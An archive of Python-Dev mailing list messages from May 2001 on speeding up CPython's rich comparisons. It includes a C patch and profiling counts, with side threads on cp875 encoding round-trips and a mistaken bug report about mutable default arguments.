Message-ID: <LNBBLJKPBEHFEDALKOLCOEGKKCAA.tim.one@home.com>

Making the 5am email concrete, this is what I meant:

Index: object.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Objects/object.c,v
retrieving revision 2.131
diff -c -r2.131 object.c
*** object.c	2001/05/11 03:36:45	2.131
--- object.c	2001/05/15 23:39:24
***************
*** 835,841 ****
  		}
  	}
  	else {
! 		res = do_richcmp(v, w, op);
  	}
  	compare_nesting--;
  	return res;
--- 835,863 ----
  		}
  	}
  	else {
! 		cmpfunc f;
! 		if (v->ob_type == w->ob_type
! 		    && RICHCOMPARE(v->ob_type) == NULL
! 		    && (f = v->ob_type->tp_compare) != NULL)
! 		{
! 			int c = (*f)(v, w);
! 			if (c < 0 && PyErr_Occurred())
! 				res = NULL;
! 			else {
! 				switch (op) {
! 					case Py_LT: c = c <  0; break;
! 					case Py_LE: c = c <= 0; break;
! 					case Py_EQ: c = c == 0; break;
! 					case Py_NE: c = c != 0; break;
! 					case Py_GT: c = c >  0; break;
! 					case Py_GE: c = c >= 0; break;
! 				}
! 				res = c ? Py_True : Py_False;
! 				Py_INCREF(res);
! 			}
! 		}
! 		else
! 			res = do_richcmp(v, w, op);
  	}
  	compare_nesting--;
  	return res;

That's a local change to PyObject_RichCompare, taking a fast path for most
scalar types (which don't have richcmps but do have tp_compare today).  On my
Win98 box reproducible timings are impossible, but it obviously chops out
layers and layers of function calls and redundant tests when it triggers.
That appears to be more often than not across all apps I've tried, from 60%
of PyObject_RichCompare calls to nearly 100%.
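
The `switch` in the patch turns one three-way result `c` (negative, zero or positive) into the answer for whichever of the six rich operators was requested. The same mapping, written as a small Python table, is sketched below; `THREE_WAY_TO_RICH`, `cmp3` and `fast_richcompare` are hypothetical names, and `cmp3` stands in for a type's `tp_compare` slot since Python 3 has no `cmp()` builtin. The patch's error path (`c < 0 && PyErr_Occurred()`) is not modelled, because a Python exception simply propagates.

```python
import operator

# One three-way result c (<0, 0, >0) answers all six rich comparisons.
THREE_WAY_TO_RICH = {
    "Py_LT": lambda c: c < 0,
    "Py_LE": lambda c: c <= 0,
    "Py_EQ": lambda c: c == 0,
    "Py_NE": lambda c: c != 0,
    "Py_GT": lambda c: c > 0,
    "Py_GE": lambda c: c >= 0,
}

def cmp3(v, w):
    """Stand-in for a type's tp_compare: returns -1, 0 or 1."""
    return (v > w) - (v < w)

def fast_richcompare(v, w, op):
    """Call the 3-way compare once, then map its result for the requested op."""
    return THREE_WAY_TO_RICH[op](cmp3(v, w))

# Sanity check against Python's own operators.
REFERENCE = {"Py_LT": operator.lt, "Py_LE": operator.le, "Py_EQ": operator.eq,
             "Py_NE": operator.ne, "Py_GT": operator.gt, "Py_GE": operator.ge}
for v, w in [(1, 2), (2, 2), (3, 2), ("a", "b")]:
    for op, ref in REFERENCE.items():
        assert fast_richcompare(v, w, op) == ref(v, w)
```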


From tim.one@home.com  Wed May 16 01:01:05 2001
From: tim.one@home.com (Tim Peters)
Date: Tue, 15 May 2001 20:01:05 -0400
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49
In-Reply-To: <200105152136.QAA00489@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEGMKCAA.tim.one@home.com>

[Tim]
> BUG ALERT:  The tuple (and list) richcmp algorithm is arguably wrong,
> because it won't believe there's any difference unless Py_EQ
> returns false for some corresponding elements:
>
> >>> class C:
> ...     def __lt__(x, y): return 1
> ...     __eq__ = __lt__
> ...
> >>> C() < C()
> 1
> >>> (C(),) < (C(),)
> 0
> >>>
>
> That doesn't make sense -- provided you believe the defn. of C
> makes sense.

[Guido]
> I think in this example the problem is with C, not with the tuple
> algorithm.

I can live with that.

> The question is, what are you going to do otherwise?  You
> could test for < first, == second -- but that means twice as many
> comparisons, and for reasonably-behaved items it makes no difference
> at all.

The question remaining is how much of this list/tuple richcmp behavior is
guaranteed by the language and how much is just implementation-dependent
fuzz.

For a more vanilla example, I removed the EQ/NE "lengths differ?" tuple
richcmp early-exit test because I never found code that made it trigger (but
tons of code that gets there without triggering).  But this has semantic
implications too:  an implementation without the early exit may call
user-defined comparison routines that raise exceptions when comparing tuples
of different lengths now.  Do you care?  (I don't.)
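
A toy model makes the semantic difference visible: with the length check, tuples of different lengths are unequal before any element is touched; without it, a user-defined `__eq__` runs and may raise. `Touchy` and `tuple_eq` are hypothetical names, and this sketch says nothing about what any particular CPython release does for tuples.

```python
class Touchy:
    """Hypothetical element whose == always raises."""
    def __eq__(self, other):
        raise ValueError("don't compare me")

def tuple_eq(v, w, early_exit):
    """Model of tuple == with an optional 'lengths differ?' shortcut."""
    if early_exit and len(v) != len(w):
        return False                    # decided without touching the items
    for x, y in zip(v, w):
        if not x == y:                  # may call a user-defined __eq__
            return False
    return len(v) == len(w)

a, b = (Touchy(),), (Touchy(), 1)
print(tuple_eq(a, b, early_exit=True))  # False, and no user code ran
try:
    tuple_eq(a, b, early_exit=False)
except ValueError as exc:
    print("without the early exit:", exc)
```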


From tim.one@home.com  Wed May 16 01:37:56 2001
From: tim.one@home.com (Tim Peters)
Date: Tue, 15 May 2001 20:37:56 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEGMKCAA.tim.one@home.com>

[Martin v. Loewis]
> ...
> I'd like to add another data point, answering the question what types
> are most frequently compared.

That varies wildly by app.  I have apps where int compares *overwhelmingly*
dominate, others where float compares do, many where string compares do, and
the last code I wrote for Zope spends most of its (very substantial) time
doing lookups of "object ids" in dicts.  In Python terms, those are Pythong
lon (unbounded) ints today, and potentially Python ints on 64-bit boxes, and
that's another case where ceval.c's special-casing of int compares is
impotent.

Heck, sort a large homogeneous array once, and whatever element type that
array has will likely dominate comparisons for the whole app!

That's why I'm so keen to chop out a half dozen layers of blubber for *all*
types that don't play the richcmp game (which today includes every type I
mentioned above).

> The first set of data is for running the Python testsuite.
>
> riches      3040952  # Calls to PyType_RichCompare
> eqs         2828345  # Calls where the types are equal
>
> String      2323122
> Float        141507
> Int          125187
> Type          99477
> Tuple         84503
> Long          30325
> Unicode       10782
> Instance       9335
> List           2997
> None            383
> Class           318
> Complex         219
> Dict             57
> Array            49
> WeakRef          34
> Function         11
> File             11
> SRE_Pattern      10
> CFunction         9
> Lock              8
> Module            1
>
> So strings cover 82% of all the compare calls of equally-typed
> objects, followed by floats with 5%. Those calls together cover 93% of
> the richcompare calls.
>
> Since this might give a blurred view of what is actually used in
> applications,

Note that the top 4 types don't have a tp_richcompare slot today.  The tuples
are likely composed of simple scalar types, and the latter benefit too.  But
as above, we can't say anything in advance about the *specific* types a given
app is going to compare most often.  There is no "typical app" in that
respect.

> I ran the PyXML testsuite with that python binary
> also. Leaving out types that are not used, I get
>
> riches        88465
> eqs           59279
>
> String        48097
> Int            5681
> Type           3170
> Tuple           760
> List            492
> Float           332
> Instance        269
> Unicode         243
> None            225
> SRE_Pattern       4
> Long              3
> Complex           3
>
> The first observation here is that "only" 67% of the calls are with
> equally-typed objects.

Someone who cares about the speed of PyXML would be well advised to figure
out why <0.9 wink>:  there's no scheme on the horizon that will speed
mixed-type comparisons one whit.

> Of those, 80% are with strings, 9% with integers.

XML is a string-crunching app, right?

> The last example is IDLE, where I just did an "import httplib", for
> fun.
>
> riches        50923
> eqs           49882
>
> String        31198
> Tuple          8312
> Type           7978
> Int            1456
> None            600
> SRE_Pattern     210
> List            122
> Instance          4
> Float             1
> Instance method   1
>
> Roughly the same picture: 97% calls with equally-typed objects, of
> those 62% strings, 3% integers. Notice the 15% for tuples and types,
> each.

Surprising!

> So to speed-up the common case clearly means to speed-up string
> comparisons.

The only thing the apps I've tried have in common is that the types compared
most often do have tp_compare but not tp_richcompare functions.  The test
suite, XML and IDLE are all heavy string-slingers.

> If I'd need to optimize anything else afterwards, I'd look into type
> objects - most likely, they are compared for EQ, which can be done
> nicely and directly in a tp_richcompare also.

Would do just as well to give them a one-liner tp_compare function (in
conjunction with the posted patch).

> Those two optimizations together would give a richcompare to 95% of
> the objects in the IDLE case.

Since that's the exact opposite of what I want to do, it's at least
interesting <wink>.  Whatever, there needs to be a (very) fast path, and it
needs to pick on something that all common types implement, including at
least strings, ints, longs, floats and-- I guess --type objects.

I don't know about other people, but I have lots of code that uses the cmp()
function heavily.  That path has also gotten bloated, and tries each of
Py_EQ, Py_LT and Py_GT in turn now, hoping for *one* of them to say "yes".
It does this now even if the tp_compare slot is defined.  The only thing
that's saving cmp()-slinging code from major sloth now is that the basic
types do *not* implement tp_richcompare, so try_rich_to_3way_compare gets out
early (before doing the three-way Py_EQ etc dance).  But give the basic
scalar types richcmp functions, and cmp() will slow down a lot (unless more
hacks are added to stop that).
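
As a rough model of the path described above, the sketch below derives a three-way answer by asking Py_EQ, then Py_LT, then Py_GT, and logs each rich call. `Probe` and `rich_to_3way` are hypothetical names; CPython's `try_rich_to_3way_compare` handles more cases (such as operators that are not implemented) than this simplification, which just raises if no operator says yes.

```python
class Probe:
    """Int wrapper that records each rich comparison made on it."""
    log = []

    def __init__(self, value):
        self.value = value

    def __eq__(self, other):
        Probe.log.append("EQ")
        return self.value == other.value

    def __lt__(self, other):
        Probe.log.append("LT")
        return self.value < other.value

    def __gt__(self, other):
        Probe.log.append("GT")
        return self.value > other.value

def rich_to_3way(v, w):
    """Try Py_EQ, Py_LT, Py_GT in turn; return 0, -1 or 1."""
    if v == w:
        return 0
    if v < w:
        return -1
    if v > w:
        return 1
    raise TypeError("no ordering between operands")  # simplification

Probe.log.clear()
print(rich_to_3way(Probe(2), Probe(1)), Probe.log)  # 1 ['EQ', 'LT', 'GT']
```

A single three-way `tp_compare` call would have produced the same `1` here; the rich route needed three calls because the first two answered "no".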


From greg@cosc.canterbury.ac.nz  Wed May 16 02:58:05 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Wed, 16 May 2001 13:58:05 +1200 (NZST)
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOEGMKCAA.tim.one@home.com>
Message-ID: <200105160158.NAA18339@s454.cosc.canterbury.ac.nz>

Tim Peters <tim.one@home.com>:

> In Python terms, those are Pythong lon (unbounded) ints today
                             ^^^^^^^
What Pythonistas wear on their feet?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From esr@thyrsus.com  Wed May 16 03:27:38 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Tue, 15 May 2001 22:27:38 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105160158.NAA18339@s454.cosc.canterbury.ac.nz>; from greg@cosc.canterbury.ac.nz on Wed, May 16, 2001 at 01:58:05PM +1200
References: <LNBBLJKPBEHFEDALKOLCOEGMKCAA.tim.one@home.com> <200105160158.NAA18339@s454.cosc.canterbury.ac.nz>
Message-ID: <20010515222738.A9996@thyrsus.com>

Greg Ewing <greg@cosc.canterbury.ac.nz>:
> Tim Peters <tim.one@home.com>:
> 
> > In Python terms, those are Pythong lon (unbounded) ints today
>                              ^^^^^^^
> What Pythonistas wear on their feet?

No, man.  It's what sexy lady Pythonistas wear on the beach in Rio.

(Yes, I know some sexy lady Pythonistas.  No, you can't have their
phone numbers.  Pthfthfthpht...)
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

Question with boldness even the existence of a God; because, if there
be one, he must more approve the homage of reason, than that of
blindfolded fear.... Do not be frightened from this inquiry from any
fear of its consequences. If it ends in the belief that there is no
God, you will find incitements to virtue in the comfort and
pleasantness you feel in its exercise...
	-- Thomas Jefferson, in a 1787 letter to his nephew


From tim.one@home.com  Wed May 16 08:14:25 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 16 May 2001 03:14:25 -0400
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
In-Reply-To: <3B00E98E.1C44FF5@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEHLKCAA.tim.one@home.com>

[MAL]
> Round-tripping is obviously very important if you use Unicode
> as basis for working on text.

Since I use 7-bit ASCII exclusively, I've been using

    encode = decode = lambda x: x

I haven't proved that's round-trippable, but haven't bumped into an exception
yet.

> I don't know about the reasoning behind making cp875 fail the
> round-trip -- Unicode certainly provides means to make mappings
> round-trip safe (e.g. by reverting to the private Unicode
> char. point areas).

Then I ignorantly but confidently (indeed, with the cheery confidence only
the truly ignorant can truly enjoy!) vote for your approach that maps the
non-round-trippable cp875 code points to None.  Better safe than sorry, by
default.  Else 6 of the 7 ambiguous chars will be silent surprises by
default.


From tim.one@home.com  Wed May 16 08:25:28 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 16 May 2001 03:25:28 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105151527.KAA28734@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEHLKCAA.tim.one@home.com>

[Guido]
> PEP 207 is quite explicit that == and != are not to be assumed each
> other's complement.  It is silent on the x==x issue but the PEP
> mentions IEEE 754 so I agree that this also shouldn't be cut short.

It's explicit about x==x too:

    (Note: Python currently assumes that x==x is always true
    and x!=x is never true; this should not be assumed.)

That's from the end of point #4, under "Proposed Resolutions".  I agreed
then, and still do <wink>.
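A minimal illustration in modern Python 3 (not from the thread). IEEE 754 NaN is the standard case where x==x is false. The sketch also shows where an identity shortcut does apply in CPython: container membership checks identity before calling ==, so the same NaN object is still "found" in a list even though it is not equal to itself.

```python
nan = float("nan")

# A bare == goes through float's comparison, which follows IEEE 754.
print(nan == nan)    # False
print(nan != nan)    # True

# Membership tests check identity first, then ==, so the very same
# NaN object is still found in the list.
print(nan in [nan])  # True
```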


From martin@loewis.home.cs.tu-berlin.de  Wed May 16 08:28:45 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Wed, 16 May 2001 09:28:45 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <15105.26334.610144.846269@slothrop.digicool.com> (message from
 Jeremy Hylton on Tue, 15 May 2001 13:26:54 -0400 (EDT))
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
 <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
 <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com>
Message-ID: <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de>

> Sounds like we ought to do a search-and-destroy on type comparisons,
> replacing with isinstance() where possible.

At least in my applications, this is unfortunately not possible: I
want a test for byte-string-or-unicode-string. This could be done with
two isinstance calls, but that is certainly less efficient.

Marc-Andre once proposed a type representing the immediate supertype
of both byte strings and unicode strings; let's call it abstract string.
Then I could write isinstance(e, types.AbstractString).
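For later readers, here is a sketch in later-Python terms. Starting with Python 2.2, isinstance() accepts a tuple of types, so "byte string or Unicode string" can be tested in a single call. Python 2.3 also added a common base class, basestring. In Python 3 the two string types are bytes and str. They share no such base, so the tuple form is the usual idiom. The helper name is_any_string is hypothetical.

```python
def is_any_string(obj):
    """Return True for text strings (str) and byte strings (bytes)."""
    # One isinstance() call with a tuple replaces two separate checks and,
    # unlike an exact type test, also accepts subclasses.
    return isinstance(obj, (str, bytes))

class MyStr(str):
    """A trivial str subclass used only to show the subclass behaviour."""

print(is_any_string("abc"))              # True
print(is_any_string(b"abc"))             # True
print(is_any_string(MyStr("x")))         # True
print(is_any_string(42))                 # False
print(type(MyStr("x")) in [str, bytes])  # False: exact-type test misses subclasses
```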

Regards,
Martin


From martin@loewis.home.cs.tu-berlin.de  Wed May 16 08:24:56 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Wed, 16 May 2001 09:24:56 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <15105.42180.401918.223487@anthem.wooz.org> (barry@digicool.com)
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
 <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
 <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.42180.401918.223487@anthem.wooz.org>
Message-ID: <200105160724.f4G7OuF01764@mira.informatik.hu-berlin.de>

>     GvR> I'm curious where the frequent comparisons of types come
>     GvR> from.
> 
> Not to mention the several hundred comparisons to None.

This is harder to analyse. I set a gdb breakpoint at the point where
RichCompare receives PyType_Type, looked at what the caller was doing,
and then ignored the breakpoint a few times. This is what I've found; I
may have missed important cases.

In PyXML, the expression

   type(e) in [types.StringType, types.UnicodeType]

is frequently computed. This is a sequence_contains, which in turn does two
Py_EQ tests. In addition, compile.c:com_add has

   t = Py_BuildValue("(OO)", v, v->ob_type)
   PyDict_GetItem(dict, t)

Again, the dictionary lookup performs Py_EQ on the tuples, which does
Py_EQ on the elements.

This also accounts for the RichCompare calls which receive None: v may
be None, here, so t is (None, type(None)).

In IDLE, the situation is similar. com_add produces many compares with
types. In addition, sre.compile has

   type(s) in sre_compile.STRING_TYPES

which is the same test as the PyXML one. Finally, there is a
type-in-typetuple test inside Tkinter._cnfmerge.
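The equality tests behind a membership check can be observed from Python with an instrumented object. The sketch below uses a hypothetical probe class in Python 3 to count how many == tests "x in some_list" performs. When nothing matches, every element is compared. When the identical object is in the list, CPython's identity shortcut answers without calling == at all.

```python
class EqCounter:
    """Hypothetical probe: counts how often it takes part in an == test."""
    calls = 0

    def __eq__(self, other):
        EqCounter.calls += 1
        return False

probe = EqCounter()

# No match: one == test per element.
EqCounter.calls = 0
print(probe in [1, "two", 3.0], EqCounter.calls)    # False 3

# The identical object is present: the identity check settles it.
EqCounter.calls = 0
print(probe in [probe, 1, 2], EqCounter.calls)      # True 0
```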

Regards,
Martin


From i_sofer@yahoo.com  Wed May 16 08:53:25 2001
From: i_sofer@yahoo.com (Idan Sofer)
Date: 16 May 2001 10:53:25 +0300
Subject: [Python-Dev] Bug report: empty dictionary as default class argument
Message-ID: <200105160756.KAA29616@alpha.netvision.net.il>

--=-uNM1Q6eCX9JH/wGWUYU9
Content-Type: text/plain

Hello.

I have found a rather annoying bug in Python, present in both Python 1.5
and Python 2.0.

If a class has an argument with a default of an empty dictionary, then
all instances of the same class will point to the same dictionary,
unless a dictionary is explicitly passed to the constructor.

I attach a piece of code that demonstrates the problem.

--=-uNM1Q6eCX9JH/wGWUYU9
Content-Type: text/x-python
Content-Disposition: attachment; filename=test.py
Content-Transfer-Encoding: 7bit

"""
Bug description:
    
A class is defined. In the __init__ method, we define an optional "attribs"
argument, which defaults to {}.

We create two instances of class foo, each of them without an argument.

We then modify the attribs attribute in one of them. Surprisingly,
the change is reflected in BOTH instances, where it should only appear in the
first one.

Workaround:

Explicitly pass an empty dictionary as the argument, or create the empty dictionary
inside the method body.
    
"""


class foo:
    
    def __init__(self,attribs={}):
	self.attribs=attribs;
	return None;
    
print "";
print "Defining Two instances of class foo:";

print "a=foo()"
print "b=foo()"
a=foo();
b=foo();
print "";
print "The 'attribs' attribute of both looks like this:";
print "a.attribs = %s" % a.attribs
print "b.attribs = %s" % b.attribs
print ""
print "Now we modify 'attribs' in a:"
print 'a.attribs["bug"]= "exists"';
a.attribs["bug"]= "exists";
print ""
print "Now, things should now look like this:"
print "a.attribs = %s" % a.attribs
print "b.attribs = %s" % "{}";
print ""
print "However, things look like this:"
print "a.attribs = %s" % a.attribs
print "b.attribs = %s" % b.attribs


--=-uNM1Q6eCX9JH/wGWUYU9--


From martin@loewis.home.cs.tu-berlin.de  Wed May 16 09:02:01 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Wed, 16 May 2001 10:02:01 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOEGMKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCOEGMKCAA.tim.one@home.com>
Message-ID: <200105160802.f4G821s02180@mira.informatik.hu-berlin.de>

> Since that's the exact opposite of what I want to do, it's at least
> interesting <wink>.

I'll put a patch on SF soon which does what you want to do, i.e. tries
tp_compare as the first thing if tp_richcompare is not there. Even
with this patch, your code is faster if strings have a
richcompare. Without richcompare, I get

0.720
0.720
0.720
0.730
0.720
0.720
0.730
0.720
0.720
0.730

With it, I get

0.710
0.720
0.720
0.710
0.710
0.720
0.710
0.710
0.710
0.720

Given that stock CVS Python is in the 0.78 range, the difference is
negligible, though.

Regards,
Martin


From larsga@garshol.priv.no  Wed May 16 09:19:10 2001
From: larsga@garshol.priv.no (Lars Marius Garshol)
Date: 16 May 2001 10:19:10 +0200
Subject: [Python-Dev] Bug report: empty dictionary as default class argument
In-Reply-To: <200105160756.KAA29616@alpha.netvision.net.il>
References: <200105160756.KAA29616@alpha.netvision.net.il>
Message-ID: <m3sni51zb5.fsf@lambda.garshol.priv.no>

* Idan Sofer
| 
| If a class has an argument with a default of an empty dictionary,
| then all instances of the same class will point to the same
| dictionary, unless the dictionary is explicitly defined by the
| constructor.

This is part of the language semantics, and so not a bug. The default
values of optional arguments are evaluated once, when the def statement
defining the function/method is executed, not on each call. You may
consider the semantics ill-advised, but it is intentional.
 
| class foo:
|     
|     def __init__(self,attribs={}):
| 	self.attribs=attribs;
| 	return None;

I usually write this as:

class Foo:

  def __init__(self, attribs = None):
    self.attribs = attribs or {}
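Here is a variation on this idiom, sketched in Python 3. It assumes callers may deliberately pass in their own dictionary, possibly an empty one. "attribs or {}" replaces any false argument with a fresh dict, and that includes an explicitly passed empty dict. Testing "is None" keeps whatever object the caller supplied. The class name FooOr is hypothetical.

```python
class Foo:
    def __init__(self, attribs=None):
        # None is a sentinel meaning "no argument given"; build a fresh
        # dict on every call instead of sharing one default object.
        if attribs is None:
            attribs = {}
        self.attribs = attribs

class FooOr:
    def __init__(self, attribs=None):
        # Replaces *any* false value, including a caller's empty dict.
        self.attribs = attribs or {}

shared = {}
print(Foo(shared).attribs is shared)    # True
print(FooOr(shared).attribs is shared)  # False

a, b = Foo(), Foo()
a.attribs["bug"] = "exists"
print(b.attribs)                        # {}
```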

--Lars M.


From fredrik@pythonware.com  Wed May 16 09:18:44 2001
From: fredrik@pythonware.com (Fredrik Lundh)
Date: Wed, 16 May 2001 10:18:44 +0200
Subject: [Python-Dev] Bug report: empty dictionary as default class argument
References: <200105160756.KAA29616@alpha.netvision.net.il>
Message-ID: <011401c0dde0$d4adb2e0$0900a8c0@spiff>

Idan Sofer wrote:
>
> I have found a rather annoying bug in Python, present in both Python 1.5
> and Python 2.0.
>
> If a class has an argument with a default of an empty dictionary, then
> all instances of the same class will point to the same dictionary,
> unless the dictionary is explicitly defined by the constructor.

maybe you should check the documentation (or the FAQ) before
submitting bugs?

    http://www.python.org/doc/current/ref/function.html

    Default parameter values are evaluated when the function
    definition is executed. This means that the expression is evaluated
    once, when the function is defined, and that that same ``pre-
    computed'' value is used for each call. This is especially important
    to understand when a default parameter is a mutable object,
    such as a list or a dictionary: if the function modifies the object
    (e.g. by appending an item to a list), the default value is in
    effect modified.
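The documented behaviour is easy to confirm. This is a minimal Python 3 sketch, and the function name append_item is hypothetical. The default list is created once, when the def statement executes, and is stored on the function object in __defaults__. Every call that omits the argument therefore mutates that same list.

```python
def append_item(item, bucket=[]):
    # The [] above was evaluated once, at definition time.
    bucket.append(item)
    return bucket

first = append_item(1)
second = append_item(2)
print(first, second)                         # [1, 2] [1, 2]
print(first is second)                       # True
print(append_item.__defaults__[0] is first)  # True
```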

Cheers /F

PS. when you do report real bugs, please use the bug tracker:

    http://sourceforge.net/tracker/?group_id=5470&atid=105470

"is this a bug" questions should be sent to comp.lang.python


From tim.one@home.com  Wed May 16 09:41:47 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 16 May 2001 04:41:47 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105151945.f4FJjxM02351@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEHOKCAA.tim.one@home.com>

[Martin]
> Producing numbers is easy :-)

If only making sense of them were too <0.6 wink>.

> I've instrumented my version where string implements richcmp, and
> special-cases everything I can think of.

1. String objects are also equal despite being different objects,
   if their ob_sinterned pointers are equal and non-NULL.  So if
   you're looking for every trick in & out of the book, that's
   another one.

2. But the real goal is to add only those special cases that in
   combination yield the largest net win, and that's much harder
   to determine (since there are no typical apps, and it's very
   hard to quantify the tradeoffs here in a credible x-platform
   x-app way).
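Point 1 can be illustrated from Python 3 with sys.intern(). Two equal strings that have both been interned are the same object, so an identity (pointer) comparison settles equality without looking at the characters. This sketch shows the principle only. It does not model how CPython 2.1 stored the ob_sinterned pointer.

```python
import sys

# Build the strings at run time so the compiler cannot share one constant.
a = "".join(["comparison", "-", "speed"])
b = "".join(["comparison-", "speed"])

print(a == b)                  # True: same characters
ia, ib = sys.intern(a), sys.intern(b)
print(ia is ib)                # True: one shared object after interning
```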

> Counting is done for running the test suite. With this, I get
>
> Calls to string_richcompare:   2378660
> Calls with different types:      33992 (ie. one is not a string)
> Calls with identical strings:   120517
> Calls where lens decide !EQ:   1775716
> ----------------------------
> Calls richcmp -> oldcomp:       448435
> Total calls to oldcomp:        1225643
> Calls oldcomp -> memcmp:        860174
>
> So 5% of the calls are with identical strings, for which I can
> immediately decide the outcome.

But also at the cost of doing a fruitless compare and branch in 95% of calls.
There isn't enough data to guess whether this is a net win or a net loss
(compared to leaving this special case out).

Note that if the "identical string pointers" special case is a net win, it
would be effective inside oldcomp instead (i.e., you don't need a richcompare
slot to exploit it); indeed, it may be more effective there, since there are
some 800,000 calls to oldcmp that *didn't* come from richcmp, and oldcmp
doesn't check for pointer equality now (but PyObject_Compare does, so there
didn't *used* to be any point to it in oldcmp).

Any idea where those 800,000 virgin calls to oldcomp are coming from?  That's
a lot.

> 75% can be decided in terms of the string lengths, which leaves ca. 19%
> for cases where lexicographical comparison is needed.

So about 1 in 5 times there's also the additional (wrt just calling oldcmp
all the time) overhead of a second function call (i.e., the call to oldcmp
made by richcmp).

> In those cases, the first byte decides in 30%. If I remove the test
> for "len decides !EQ", I get
>
> #riches:                       2358322
> #riches_ni:                      34108
> #idents_decide:                 102050
> #lens_decide:                        0
> --------------------------------------
> rest(computed):                2222164
> #comps:                        2949421
> #memcmps:                       917776
>
> So still, ca. 30% can be decided by first byte.

Sorry, I couldn't follow this part, except noting that 917776 is about 30% of
2949421, in which case I would have expected you to say that 70% can be
decided by first byte.

> It still appears that the total number of calls to memcmp is higher
> when the length is not taken into consideration.

Since 917776 is larger than the earlier 860174, isn't that plain?  BTW, some
compilers inline memcmp, so assuming it's "a call" is a x-platform trap; of
course assuming it *isn't* is also a x-platform trap.

> To verify this claim, I've counted the cases where the length
> decides the outcome, but looking at the first byte also had:
>
> lens_decide:                    1784897
> lens_decide_firstbyte_wouldhave:1671148
>
> So in 6% of the cases, checking the length alone gives a decision
> which looking at the first byte doesn't; plus it saves a function
> call.

OTOH, 19% of all richcmp calls ended up calling oldcmp too, so the *net*
effect is muddy at best.
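The shortcuts discussed above can be made concrete with a Python model of an equality test on byte strings. It counts which shortcut decided each comparison. This is a hypothetical sketch of the decision order only: identity first, then length, then first byte, then a full compare. It is not the C code from Martin's patch, and the counter names are made up.

```python
from collections import Counter

stats = Counter()

def string_eq(a: bytes, b: bytes) -> bool:
    """Model of a Py_EQ test with fast paths tried in order."""
    if a is b:
        stats["identity"] += 1       # same object: trivially equal
        return True
    if len(a) != len(b):
        stats["length"] += 1         # equal strings must have equal lengths
        return False
    if a[:1] != b[:1]:
        stats["first_byte"] += 1     # cheap check before a full compare
        return False
    stats["full_compare"] += 1       # stands in for memcmp()
    return a == b

x = b"spam"
pairs = [(x, x), (b"spam", b"eggs!"), (b"spam", b"ham!"), (b"spam", b"spat")]
results = [string_eq(p, q) for p, q in pairs]
print(results)       # [True, False, False, False]
print(dict(stats))   # {'identity': 1, 'length': 1, 'first_byte': 1, 'full_compare': 1}
```

For Py_LT, which sorting needs, the length shortcut cannot decide anything, while the first-byte test often can.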

> To support the thesis that Py_EQ is the common case for strings, I
> counted the various operations:
>
> pyEQ:2271593
> pyLE:9234
> pyGE:0
> pyNE:20470
> pyLT:22765
> pyGT:578

This clearly wasn't doing much sorting of strings (or of tuples containing
strings, etc) -- .sort() never uses pyEQ (it only uses pyLT).
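The remark that sorting asks only for "less than" can be checked in Python 3 with a hypothetical wrapper class. The wrapper counts which rich comparisons list.sort() invokes.

```python
from collections import Counter

calls = Counter()

class Key:
    """Hypothetical wrapper that records each rich comparison made on it."""
    def __init__(self, value):
        self.value = value

    def __lt__(self, other):
        calls["lt"] += 1
        return self.value < other.value

    def __eq__(self, other):
        calls["eq"] += 1
        return self.value == other.value

items = [Key(s) for s in ["pear", "apple", "fig", "banana"]]
items.sort()
print([k.value for k in items])  # ['apple', 'banana', 'fig', 'pear']
print(calls["eq"])               # 0: sort never asked for ==
print(calls["lt"] > 0)           # True
```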

> Now, that might be flawed since comparing strings for equal is
> extremely frequent in the testsuite. To give more credibility to the
> data, I also ran setup.py with my instrumented ./python:

In the absence of non-trivial use of sorting or the bisect module or one of
the search tree modules out there, it's easy to buy that PyEQ is most common
for strings.  What's not clear is that adding a rich comparison slot actually
helps overall (as compared to continuing to let string_compare() handle it,
and if the pointer equality test actually saves more than it costs, adding it
there instead).  It's clearer that this is going to hurt sorting (& bisect
etc), by adding yet another layer of function call to get Py_LT resolved (as
for dict compares too, the string richcmp can't do anything to speed up Py_LT
that string oldcmp can't do just as efficiently -- indeed, that's the great
advantage oldcmp's "compare first character" test had:  that *can* decide
Py_LT in one byte much of the time (but length comparison cannot)).

